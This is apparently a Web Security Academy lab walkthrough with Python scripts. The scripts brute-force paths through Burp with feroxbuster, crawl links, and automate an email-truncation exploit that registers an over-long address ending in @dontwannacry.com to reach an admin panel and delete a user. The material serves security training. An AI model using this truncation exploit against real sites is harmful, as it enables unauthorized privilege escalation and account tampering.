Access the lab, add its domain to Burp's Target scope and tick "Include subdomains". View the page source of the / route and inspect it, then request every embedded link through the Burp proxy so each one lands in the site map. The script below additionally brute-forces common paths with feroxbuster, routed through the same proxy so the results are captured as well.
import os
import platform
import subprocess
import sys


def check_binary(binary_name):
    # Look the binary up on PATH with the platform's lookup command
    if sys.platform.startswith('linux') or sys.platform.startswith('darwin'):
        command = ['which', binary_name]
    elif sys.platform.startswith('win'):
        command = ['where', binary_name]
    else:
        print("Unsupported operating system")
        return
    try:
        subprocess.check_output(command)
        return True
    except subprocess.CalledProcessError:
        print(f"{binary_name} is not installed.")
        return False


def install_binary(binary_url, binary_name):
    os_name = platform.system().lower()
    binary_file = f"{binary_name}.zip" if os_name == 'windows' else f"{binary_name}.tar.gz"
    # Check if binary exists
    if not check_binary(binary_name):
        # Download Binary File if not exist
        if not os.path.exists(binary_file):
            if os_name == 'linux':
                download_command = f"curl -L {binary_url}/x86_64-linux-{binary_name}.tar.gz -o {binary_file}"
            elif os_name == 'darwin':
                download_command = f"curl -L {binary_url}/x86_64-macos-{binary_name}.tar.gz -o {binary_file}"
            elif sys.platform.startswith('win'):
                download_command = f"powershell -Command 'Invoke-WebRequest {binary_url}/x86_64-windows-{binary_name}.exe.zip -OutFile {binary_file}'"
            else:
                print("Unsupported operating system")
                return
            try:
                subprocess.run(download_command, shell=True, check=True)
                print(f"{binary_name} downloaded successfully")
            except subprocess.CalledProcessError as e:
                print(f"Failed to download {binary_name}: {e}")
        # Install Binary
        if os.path.exists(binary_file):
            if os_name in ['linux', 'darwin']:
                # Extract only the binary itself straight into /usr/local/bin
                extract_command = (
                    f"sudo tar -C /usr/local/bin/ -xzf {binary_file} {binary_name} "
                    f"&& sudo chmod 775 /usr/local/bin/{binary_name}"
                )
            elif sys.platform.startswith('win'):
                extract_command = (
                    f"Powershell -Command \"Expand-Archive -Path {binary_file} -DestinationPath . ; "
                    f"Move-Item -Path .\\{binary_name}.exe -Destination 'C:\\Windows\\'\""
                )
            else:
                print("Unsupported operating system")
                return
            try:
                subprocess.run(extract_command, shell=True, check=True)
                print(f"{binary_name} installed successfully")
            except subprocess.CalledProcessError as e:
                print(f"Failed to install {binary_name}: {e}")
            # Clean up downloaded binary file
            try:
                cleanup_command = f"rm {binary_file}" if os_name != 'windows' else f"del {binary_file}"
                subprocess.run(cleanup_command, shell=True, check=True)
                print(f"Cleaned up {binary_file}")
            except subprocess.CalledProcessError as e:
                print(f"Failed to clean up {binary_file}: {e}")
    else:
        print(f"{binary_name} is already installed.")


def enumerate_path(endpoint, wordlist_path):
    # -C 404 filters out not-found responses; --proxy sends every request via Burp;
    # --insecure accepts Burp's interception certificate
    print("Enumerating paths...")
    fuzz_command = (
        f"feroxbuster -u {endpoint} -w {wordlist_path} -C 404 "
        f"--proxy http://127.0.0.1:8080 --insecure --quiet --no-state --auto-tune"
    )
    process = subprocess.Popen(fuzz_command.split(), stdout=subprocess.PIPE,
                               stderr=subprocess.STDOUT, text=True)
    for line in process.stdout:
        print(line.strip())


def main():
    binary_url = "https://github.com/epi052/feroxbuster/releases/download/v2.10.2"
    binary_name = "feroxbuster"
    endpoint = "https://0abf002f043f115b801d992a002a0035.web-security-academy.net/"
    wordlist_path = "wordlist.txt"
    install_binary(binary_url, binary_name)
    enumerate_path(endpoint, wordlist_path)


if __name__ == "__main__":
    main()
The custom word list used for the above enumeration.
accounts
admin
administrator
api
users
products
product
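The feroxbuster script covers path brute-forcing but not the "request every embedded link through the proxy" step. The following is an added example (not code from the original post) that does that part with the standard library only: it pulls link targets out of a page, keeps only those on the lab host or its subdomains (mirroring Burp's "Include subdomains" scope rule, so a host that merely ends in the scope string is rejected), de-duplicates them, and fetches each one through Burp on 127.0.0.1:8080. The lab host is taken from the script above; the sample HTML is constructed for the offline self-check and is not a real lab response.

```python
import ssl
import urllib.request
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

SCOPE_HOST = "0abf002f043f115b801d992a002a0035.web-security-academy.net"
BURP_PROXY = "http://127.0.0.1:8080"

# Tag -> attribute pairs that reference another resource the proxy should see.
LINK_ATTRS = {"a": "href", "link": "href", "script": "src",
              "img": "src", "iframe": "src", "form": "action"}

# Constructed sample page for the offline check below (not lab output).
SAMPLE_HTML = """<html><head><link rel="stylesheet" href="/resources/labs.css"></head>
<body>
<a href="/my-account">My account</a>
<a href="/product?productId=1">View details</a>
<a href="/my-account#top">Same page, different fragment</a>
<a href="https://cdn.example.org/lib.js">Out of scope</a>
<form action="/login" method="POST"></form>
<script src="/resources/js/app.js"></script>
</body></html>"""


class LinkCollector(HTMLParser):
    """Collects absolute URLs from the attributes listed in LINK_ATTRS."""

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.links = []

    def handle_starttag(self, tag, attrs):
        wanted = LINK_ATTRS.get(tag)
        if wanted is None:
            return
        for name, value in attrs:
            if name == wanted and value:
                self.links.append(urljoin(self.base_url, value))


def in_scope(url, scope_host=SCOPE_HOST):
    """True for the scope host itself and any subdomain of it (dot-anchored,
    so 'evil' + scope_host does not match)."""
    host = urlsplit(url).hostname or ""
    return host == scope_host or host.endswith("." + scope_host)


def extract_links(html, base_url, scope_host=SCOPE_HOST):
    """Unique, in-scope, fragment-stripped links in document order."""
    parser = LinkCollector(base_url)
    parser.feed(html)
    seen, result = set(), []
    for link in parser.links:
        link = link.split("#", 1)[0]          # fragments never reach the server
        if link not in seen and in_scope(link, scope_host):
            seen.add(link)
            result.append(link)
    return result


def fetch_via_burp(url, proxy=BURP_PROXY):
    """GET a URL through Burp; certificate checks are off because Burp
    presents its own CA-signed certificate for intercepted TLS."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    opener = urllib.request.build_opener(
        urllib.request.ProxyHandler({"http": proxy, "https": proxy}),
        urllib.request.HTTPSHandler(context=ctx))
    with opener.open(url, timeout=15) as resp:
        return resp.status, resp.read().decode(errors="replace")


if __name__ == "__main__":
    base = "https://" + SCOPE_HOST + "/"
    status, html = fetch_via_burp(base)
    print(status, base)
    for link in extract_links(html, base):
        code, _ = fetch_via_burp(link)
        print(code, link)
```

Run it with Burp listening on 127.0.0.1:8080 and the lab in scope; every fetched URL then appears in the site map alongside the feroxbuster results. Extend `LINK_ATTRS` if the page you are looking at references resources through other attributes.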
Exploration
With Burp Suite running and the browser's FoxyProxy extension switched to the Burp profile, explore the application by registering an account and logging in. Observe that there is no feature for changing the email address after registration.
Exploitation
We can abuse the application's handling of over-long input (an input-truncation flaw, not a memory-corruption buffer overflow) to force our stored email address to end with the @dontwannacry.com host: register with an address long enough that, once the application cuts it down, what remains ends in @dontwannacry.com. After logging in with that account the 'Admin Panel' tab becomes active. Click on it, then delete the Carlos user. This exploit can be automated with the script below
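As an added example (not the author's script and not part of the original post), the following builds the over-long address and submits the registration form through Burp. It assumes the application truncates stored email addresses to `EMAIL_LIMIT` characters (255 is assumed here; replace it with whatever the lab actually shows), that registration is a POST to /register with `csrf`, `username`, `email` and `password` fields, and that the confirmation mail is delivered to the full, untruncated address at a mailbox domain you control (the placeholder exploit-server domain below is an assumption). `truncate` is a model of the assumed server-side behaviour used only to check the payload before sending it.

```python
import re
import ssl
import urllib.parse
import urllib.request
from http.cookiejar import CookieJar

EMAIL_LIMIT = 255                  # assumed truncation limit; verify it in the lab
TARGET_SUFFIX = "@dontwannacry.com"
BURP_PROXY = "http://127.0.0.1:8080"


def craft_email(mailbox_domain, limit=EMAIL_LIMIT, suffix=TARGET_SUFFIX, pad="a"):
    """Return <pad...>@dontwannacry.com.<mailbox_domain>, padded so that the
    first `limit` characters are exactly <pad...>@dontwannacry.com.
    The full address still routes mail to `mailbox_domain`."""
    pad_len = limit - len(suffix)
    if pad_len < 1:
        raise ValueError("limit too small for the target suffix")
    return pad * pad_len + suffix + "." + mailbox_domain


def truncate(email, limit=EMAIL_LIMIT):
    """Model of the assumed server-side truncation."""
    return email[:limit]


def opener_via_burp(proxy=BURP_PROXY):
    """Cookie-aware opener that tunnels through Burp and accepts its
    interception certificate."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    return urllib.request.build_opener(
        urllib.request.ProxyHandler({"http": proxy, "https": proxy}),
        urllib.request.HTTPSHandler(context=ctx),
        urllib.request.HTTPCookieProcessor(CookieJar()))


def get_csrf(opener, base_url):
    """Fetch /register and pull the csrf token out of the form (assumed markup)."""
    with opener.open(base_url.rstrip("/") + "/register", timeout=15) as resp:
        page = resp.read().decode(errors="replace")
    match = re.search(r'name="csrf"\s+value="([^"]+)"', page)
    if not match:
        raise RuntimeError("csrf token not found on /register")
    return match.group(1)


def register(opener, base_url, csrf, username, password, email):
    """POST the registration form; returns the HTTP status and body."""
    body = urllib.parse.urlencode({
        "csrf": csrf, "username": username, "email": email, "password": password,
    }).encode()
    req = urllib.request.Request(base_url.rstrip("/") + "/register",
                                 data=body, method="POST")
    with opener.open(req, timeout=15) as resp:
        return resp.status, resp.read().decode(errors="replace")


if __name__ == "__main__":
    base = "https://0abf002f043f115b801d992a002a0035.web-security-academy.net"
    # Assumed placeholder: the mailbox domain of your own exploit server.
    email = craft_email("YOUR-EXPLOIT-SERVER-ID.exploit-server.net")
    print("submitting :", email)
    print("stored as  :", truncate(email))
    opener = opener_via_burp()
    status, _ = register(opener, base, get_csrf(opener, base),
                         "attacker", "Sup3rS3cret!", email)
    print("register ->", status)
```

After the POST, open the confirmation link from your exploit server's email client, log in as the new user and the admin panel should be reachable; the Carlos deletion is still a click in the browser. If the stored address shown on the account page is not exactly `truncate(email)`, the limit assumption is wrong and `EMAIL_LIMIT` needs adjusting.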